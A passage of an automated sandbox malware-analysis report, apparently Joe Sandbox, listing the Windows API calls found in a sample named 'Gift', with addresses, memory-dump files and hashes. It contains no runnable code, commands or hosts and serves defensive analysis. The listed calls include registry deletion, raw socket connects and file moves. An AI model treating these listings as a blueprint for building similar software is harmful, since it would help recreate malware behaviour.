                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$LocalTime
                                                                          • String ID:
                                                                          • API String ID: 2945705084-0
                                                                          • Opcode ID: 8b1839cbf3f7174b43b825748992e1444d7248410855971ebd8e147acfc1e3f5
                                                                          • Instruction ID: bcdfcbaba9a842567c334ca5ce26bd56b80c727bd793eb55db74a96d653d1e69
                                                                          • Opcode Fuzzy Hash: 8b1839cbf3f7174b43b825748992e1444d7248410855971ebd8e147acfc1e3f5
                                                                          • Instruction Fuzzy Hash: 8F419065C7161C75CB12FBB4CC869DFF3B8AF05350F508866EA09E3121E634A329CBA5
                                                                          APIs
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00333B8A,?), ref: 00334BE0
                                                                            • Part of subcall function 00334BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00333B8A,?), ref: 00334BF9
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00333BAA
                                                                          • _wcscmp.LIBCMT ref: 00333BC6
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00333BDE
                                                                          • _wcscat.LIBCMT ref: 00333C26
                                                                          • SHFileOperationW.SHELL32(?), ref: 00333C92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 1377345388-1173974218
                                                                          • Opcode ID: 4f2efd5dea622c0d970c77425d39827c1a98f0b0cfd5c906a2ca4e2d3635812d
                                                                          • Instruction ID: 26ecaed77e8c93bf1ec1da7c2b01fd3cd2ec63165522ca8638dda954838e83f3
                                                                          • Opcode Fuzzy Hash: 4f2efd5dea622c0d970c77425d39827c1a98f0b0cfd5c906a2ca4e2d3635812d
                                                                          • Instruction Fuzzy Hash: 7F419F7140D3449AC757EF64D481AEBB7ECAF89380F50592EF489C71A1EB34D688CB52
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003578CF
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00357976
                                                                          • IsMenu.USER32(?), ref: 0035798E
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003579D6
                                                                          • DrawMenuBar.USER32 ref: 003579E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                          • String ID: 0
                                                                          • API String ID: 3866635326-4108050209
                                                                          • Opcode ID: a4ec57a8cbcc19d4c1d3a056c152632a78835cb514d268fbd125ef33f46654b3
                                                                          • Instruction ID: c9623c7dd9904385ee48547062fb0776c57c8cc208e4ff7cad56662531a25956
                                                                          • Opcode Fuzzy Hash: a4ec57a8cbcc19d4c1d3a056c152632a78835cb514d268fbd125ef33f46654b3
                                                                          • Instruction Fuzzy Hash: EA418B70A08208EFDB22DF54E884EAABBF9FF05311F018129ED4597260C770AD54CFA0
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00351631
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0035165B
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00351712
                                                                            • Part of subcall function 00351602: RegCloseKey.ADVAPI32(?), ref: 00351678
                                                                            • Part of subcall function 00351602: FreeLibrary.KERNEL32(?), ref: 003516CA
                                                                            • Part of subcall function 00351602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003516ED
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 003516B5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 395352322-0
                                                                          • Opcode ID: 976fd725d20fe159d12c4b9952f0ceb769129ac1fa3782cf462665c38deb92c2
                                                                          • Instruction ID: da4e616c5efea970fc1a31aa56d2d262fd9228ca87e04bc46066ce2eef5dcb55
                                                                          • Opcode Fuzzy Hash: 976fd725d20fe159d12c4b9952f0ceb769129ac1fa3782cf462665c38deb92c2
                                                                          • Instruction Fuzzy Hash: C4310DB1901109BFDB169B94DC86EFFB7BCEF08301F044169E912A2150EBB49E499BA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00356911
                                                                          • GetWindowLongW.USER32(013752A0,000000F0), ref: 00356944
                                                                          • GetWindowLongW.USER32(013752A0,000000F0), ref: 00356979
                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003569AB
                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003569D5
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003569E6
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00356A00
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 2178440468-0
                                                                          • Opcode ID: 1d26af039fef44098c733f0ae6ea3a76b0b36b2a7daa3e7f67b8ff1810693354
                                                                          • Instruction ID: 773579fcfd5269fa717ab1f2f012e7e8c5df15690a168df55c2b73b3f0974ad8
                                                                          • Opcode Fuzzy Hash: 1d26af039fef44098c733f0ae6ea3a76b0b36b2a7daa3e7f67b8ff1810693354
                                                                          • Instruction Fuzzy Hash: 2B315A306081509FDB22CF58DC8AF6537E9FB49352F5A41A5F9058F2B2CB72AC44CB50
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E2CA
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E2F0
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0032E2F3
                                                                          • SysAllocString.OLEAUT32(?), ref: 0032E311
                                                                          • SysFreeString.OLEAUT32(?), ref: 0032E31A
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0032E33F
                                                                          • SysAllocString.OLEAUT32(?), ref: 0032E34D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 2f870adee76b0034e9a6649de2c7692f3f6ec99776ddf52f32406de09774be87
                                                                          • Instruction ID: 0558a25322331d6aeded6bd03c89ba3f073e3ac14ad9d98ee36dce6c17364e45
                                                                          • Opcode Fuzzy Hash: 2f870adee76b0034e9a6649de2c7692f3f6ec99776ddf52f32406de09774be87
                                                                          • Instruction Fuzzy Hash: 3221A776604219BF9F12DFA8DC89CBF77ACEB09360B458125FA15DB250DAB0EC418B60
                                                                          APIs
                                                                            • Part of subcall function 00348475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003484A0
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003468B1
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003468C0
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003468F9
                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00346902
                                                                          • WSAGetLastError.WSOCK32 ref: 0034690C
                                                                          • closesocket.WSOCK32(00000000), ref: 00346935
                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0034694E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 910771015-0
                                                                          • Opcode ID: b5c562a6144cb01bda2dfff85c4882dbc37e1392d3aca86808059de6a7c2065f
                                                                          • Instruction ID: 832d30fbf1976263c24481ce51b54e631c37d00ab7981e4ca6b861d5cd314834
                                                                          • Opcode Fuzzy Hash: b5c562a6144cb01bda2dfff85c4882dbc37e1392d3aca86808059de6a7c2065f
                                                                          • Instruction Fuzzy Hash: 6231B571600214AFDB11AF64CC86BBE77EDEB45725F058019F905AB291CBB4BD048BA2
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E3A5
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E3CB
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0032E3CE
                                                                          • SysAllocString.OLEAUT32 ref: 0032E3EF
                                                                          • SysFreeString.OLEAUT32 ref: 0032E3F8
                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0032E412
                                                                          • SysAllocString.OLEAUT32(?), ref: 0032E420
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                          • String ID:
                                                                          • API String ID: 3761583154-0
                                                                          • Opcode ID: 0bf4d84f1bf6784529ad0ca5cab17dbf929e804e52fb93e86245eb36bde6fb26
                                                                          • Instruction ID: 0ffeb79266113c708f95f953fc16243ec7c8a3762c8a3aee2063de9097c30523
                                                                          • Opcode Fuzzy Hash: 0bf4d84f1bf6784529ad0ca5cab17dbf929e804e52fb93e86245eb36bde6fb26
                                                                          • Instruction Fuzzy Hash: 76219B35604114AFDB15EFB9EC8ACBF77ECEB09360B018125FA05CB260DAB0EC418B64
                                                                          APIs
                                                                            • Part of subcall function 002D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                            • Part of subcall function 002D2111: GetStockObject.GDI32(00000011), ref: 002D2163
                                                                            • Part of subcall function 002D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00357C57
                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00357C64
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00357C6F
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00357C7E
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00357C8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 1025951953-3636473452
                                                                          • Opcode ID: 15feb40c0a0fa9ea5c28ca31f28d2c1562c67fef25c73d3b33f3ff5565cef86a
                                                                          • Instruction ID: 9313deb8ac214e133401ccc48bcf3bb59b5b0fe9464f2b7f040f19dc396a4799
                                                                          • Opcode Fuzzy Hash: 15feb40c0a0fa9ea5c28ca31f28d2c1562c67fef25c73d3b33f3ff5565cef86a
                                                                          • Instruction Fuzzy Hash: 281182B2150219BEEF169F64CC85EE77F6DEF08798F014115FA08A60A0C772AC25DBA4
                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 002F9D16
                                                                            • Part of subcall function 002F33B7: EncodePointer.KERNEL32(00000000), ref: 002F33BA
                                                                            • Part of subcall function 002F33B7: __initp_misc_winsig.LIBCMT ref: 002F33D5
                                                                            • Part of subcall function 002F33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002FA0D0
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002FA0E4
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002FA0F7
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002FA10A
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002FA11D
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002FA130
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002FA143
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002FA156
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002FA169
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002FA17C
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002FA18F
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002FA1A2
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002FA1B5
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002FA1C8
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002FA1DB
                                                                            • Part of subcall function 002F33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002FA1EE
                                                                          • __mtinitlocks.LIBCMT ref: 002F9D1B
                                                                          • __mtterm.LIBCMT ref: 002F9D24
                                                                            • Part of subcall function 002F9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002F9D29,002F7EFD,0038CD38,00000014), ref: 002F9E86
                                                                            • Part of subcall function 002F9D8C: _free.LIBCMT ref: 002F9E8D
                                                                            • Part of subcall function 002F9D8C: DeleteCriticalSection.KERNEL32(0R9,?,?,002F9D29,002F7EFD,0038CD38,00000014), ref: 002F9EAF
                                                                          • __calloc_crt.LIBCMT ref: 002F9D49
                                                                          • __initptd.LIBCMT ref: 002F9D6B
                                                                          • GetCurrentThreadId.KERNEL32 ref: 002F9D72
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                          • String ID:
                                                                          • API String ID: 3567560977-0
                                                                          • Opcode ID: b3e2f69db8a54836db512329561246b5b005ada74e6d0d078a3384a65c149fa2
                                                                          • Instruction ID: 35609167ae7337e0b9f8fbd59a422636f193a49f460cf73e647a5646a6dfdf3a
                                                                          • Opcode Fuzzy Hash: b3e2f69db8a54836db512329561246b5b005ada74e6d0d078a3384a65c149fa2
                                                                          • Instruction Fuzzy Hash: ABF0623253571A59E6357B747C0377AE694DB42BF0F20473AF654D50D2EF1184A14990
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002F4282,?), ref: 002F41D3
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 002F41DA
                                                                          • EncodePointer.KERNEL32(00000000), ref: 002F41E6
                                                                          • DecodePointer.KERNEL32(00000001,002F4282,?), ref: 002F4203
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoInitialize$combase.dll
                                                                          • API String ID: 3489934621-340411864
                                                                          • Opcode ID: adad0e076c05fb1e961c044ed69e7f987fd99b35fccc774fddb0648acbbac314
                                                                          • Instruction ID: f50ddde8523214f74d39e593a3c279be32113da31294c90224f990b4d808287d
                                                                          • Opcode Fuzzy Hash: adad0e076c05fb1e961c044ed69e7f987fd99b35fccc774fddb0648acbbac314
                                                                          • Instruction Fuzzy Hash: 0BE01A756A0701AFEF572F70ED4EB5A366CAB11B46F608425F501D51A0CBF640848F00
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002F41A8), ref: 002F42A8
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 002F42AF
                                                                          • EncodePointer.KERNEL32(00000000), ref: 002F42BA
                                                                          • DecodePointer.KERNEL32(002F41A8), ref: 002F42D5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: 688d3a32c277c04a75f9723321d5d4d26c61a02e6b3ac3fa893cf46018b65633
                                                                          • Instruction ID: d715f3d7e99e3c5613c6807dfe5c270e57480b9452a6a054f78898444129b25d
                                                                          • Opcode Fuzzy Hash: 688d3a32c277c04a75f9723321d5d4d26c61a02e6b3ac3fa893cf46018b65633
                                                                          • Instruction Fuzzy Hash: 45E0B6745A0701ABDF579F60AD0EB563A7CBB00B42F608526F501E51B4CBF64698CB14
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 002D21B8
                                                                          • GetWindowRect.USER32(?,?), ref: 002D21F9
                                                                          • ScreenToClient.USER32(?,?), ref: 002D2221
                                                                          • GetClientRect.USER32(?,?), ref: 002D2350
                                                                          • GetWindowRect.USER32(?,?), ref: 002D2369
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$Client$Window$Screen
                                                                          • String ID:
                                                                          • API String ID: 1296646539-0
                                                                          • Opcode ID: 931c975de3545d0622d758e033158fe9d26fd38da1f94a168d765baae670afc5
                                                                          • Instruction ID: 4aa3e1314a494c75c8d978214a89bdbadb6690628d4b971da1e43cba57c9a81a
                                                                          • Opcode Fuzzy Hash: 931c975de3545d0622d758e033158fe9d26fd38da1f94a168d765baae670afc5
                                                                          • Instruction Fuzzy Hash: 5EB1793991024ADBDB10CFA8C5847EEB7B1FF18310F14816AED59AB350DB74AE64CB64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 3253778849-0
                                                                          • Opcode ID: a3960745c7e0411a19d53e671930073a89f54e9de2642b05b2d2c3cf3d093c00
                                                                          • Instruction ID: 59e2d62b5733174418aa7e126c70b811b4f49989520e448a7b82400268c43837
                                                                          • Opcode Fuzzy Hash: a3960745c7e0411a19d53e671930073a89f54e9de2642b05b2d2c3cf3d093c00
                                                                          • Instruction Fuzzy Hash: 7661CE3111029AAFCF12EF60CC86EFE77A9AF05348F448569F9959B292DB349C25CF50
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0035091D
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0035095D
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00350980
                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003509A9
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003509EC
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003509F9
                                                                          Memory Dump Source
